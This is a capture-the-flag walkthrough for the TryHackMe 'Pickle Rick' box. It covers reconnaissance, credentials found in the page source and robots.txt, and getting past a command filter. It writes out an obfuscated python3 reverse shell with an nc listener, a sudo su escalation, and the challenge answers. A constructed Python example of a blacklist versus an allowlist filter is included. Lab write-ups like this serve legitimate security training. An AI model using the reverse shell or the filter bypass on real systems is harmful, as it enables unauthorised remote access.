Pickle Rick TryHackMe

performed by: jb-williams

Pickle Rick

To access the box, put the machine's IP into this URL: https://<IP>.p.thmlabs.com

  • Browsing to the site, we can start gathering information.
  • First, it is always good to View Page Source to see if there are any information disclosures accidentally left in the HTML source code.
  • Doing so, you can see a comment left in the source code reminding Rick that the username for his account is R1ckRul3s.

  • Now we scan the box with nmap to see what info we can gather.
nmap -v -sC -sV -oN nmap/initial <IP>
  • Found OpenSSH 7.2p2 on port 22
  • Found Apache httpd 2.4.18 on port 80

  • While nmap was running I went to the site to check whether there was anything interesting in the robots.txt file.
  • There was a single ‘word’ in that file: Wubbalubbadubdub

  • I like to use feroxbuster instead of gobuster, just personal preference. So I ran my usual feroxbuster command, which also routes the requests through my web proxy, zaproxy (similar to Burp), so I can capture and reuse any of them.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -x php,php5,htm,html,html5,js,txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.24.209/
  • Found a hidden /login.php route and began fuzzing Rick's login with the username R1ckRul3s.
  • After some time fuzzing the password with zaproxy and poking around, I went back to /robots.txt and was reminded of Wubbalubbadubdub.
  • I was able to log in to Rick's account with username: R1ckRul3s password: Wubbalubbadubdub

  • Logging in brought me to /portal.php, with the first page being a Command Panel.
  • I immediately tried running ls and saw that it did list the directory contents:
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
  • Trying to cat any file gets a response saying that command is disabled.
  • A go-to for me that seems a little long but usually works is this bash syntax. It reads files from the current working directory by default; use an absolute path if necessary:
while read line; do echo $line; done < $FILE
Example:
while read line; do echo $line; done < Sup3rS3cretPickl3Ingred.txt
  • I did that with both Sup3rS3cretPickl3Ingred.txt (our answer for question one) and clue.txt (the clue to the next ingredient).
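As an added illustration, not code from the original write-up or from the box itself (whose source is not shown here): a constructed model of the panel's "command disabled" check beside an allowlist-based validator, run over the same inputs the write-up uses. The BLOCKED and ALLOWED sets and the function names are assumptions.

```python
import shlex
import subprocess

# Assumed model of the panel's filter: a substring blacklist of disabled words.
BLOCKED = {"cat", "python3"}

# Assumed allowlist for a hardened panel: only read-only listing commands.
ALLOWED = {"ls", "pwd", "whoami"}


def blacklist_allows(cmd: str) -> bool:
    """Naive check: reject only if a blocked word appears verbatim in the input.
    Anything that avoids the literal word (a read loop instead of cat, a
    backslash inside the program name) passes, which is what the write-up saw."""
    return not any(word in cmd for word in BLOCKED)


def allowlist_allows(cmd: str) -> bool:
    """Hardened check: refuse shell metacharacters, tokenize the way the shell
    would, and accept only a single program whose name is on the allowlist."""
    if any(ch in cmd for ch in ";|&<>`$(){}\n"):
        return False  # no chaining, redirection or substitution at all
    try:
        tokens = shlex.split(cmd)  # the shell would read 'p\ython3' as 'python3'
    except ValueError:
        return False  # unbalanced quotes
    return bool(tokens) and tokens[0] in ALLOWED


def run_allowed(cmd: str) -> str:
    """Run an allowed command as an argv list, never through a shell."""
    if not allowlist_allows(cmd):
        return "Command disabled"
    result = subprocess.run(shlex.split(cmd), capture_output=True, text=True, timeout=5)
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs, mirroring the commands used in the write-up.
    for sample in ("ls -la", "cat clue.txt",
                   "while read line; do echo $line; done < clue.txt",
                   "p\\ython3 -c 'import os'"):
        print(f"{sample!r:52} blacklist={blacklist_allows(sample)} "
              f"allowlist={allowlist_allows(sample)}")
```

The blacklist lets both the read loop and the escaped interpreter name through; the allowlist rejects them before any shell sees the string.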

  • I tried some different commands and found that this slightly obfuscated python3 reverse shell worked. To catch the shell, I ran this listener on my local machine:
nc -lnvp 4444

In the command panel I pasted this (make sure you change the IP and port to your own):

p\ython3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<IP>",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

  • Once I had a shell on the machine I ran ls /home to see any users' home directories.
  • Noticed Rick's, so I ran ls -la /home/rick and saw a file named second ingredients.
  • Seeing the output that way told me it was a file with a space in the name, so to cat it I ran:
cat /home/rick/second\ ingredients
  • And that got us the answer to the second question.

  • Gathering more information about the system, I ran sudo -l and saw that the user www-data (which was the user I was running as) could run any command with sudo without a password, so I ran:
sudo su
  • And was given root access.

  • I moved over to the /root directory, listed its contents, and saw 3rd.txt.
  • After using cat to display 3rd.txt, we got the answer to the last question.

What is the first ingredient Rick needs?

  • Answer: mr. meeseek hair

What's the second ingredient Rick needs?

  • Answer: 1 jerry tear

What's the final ingredient Rick needs?

  • Answer: fleep juice

written and performed by jb-williams - github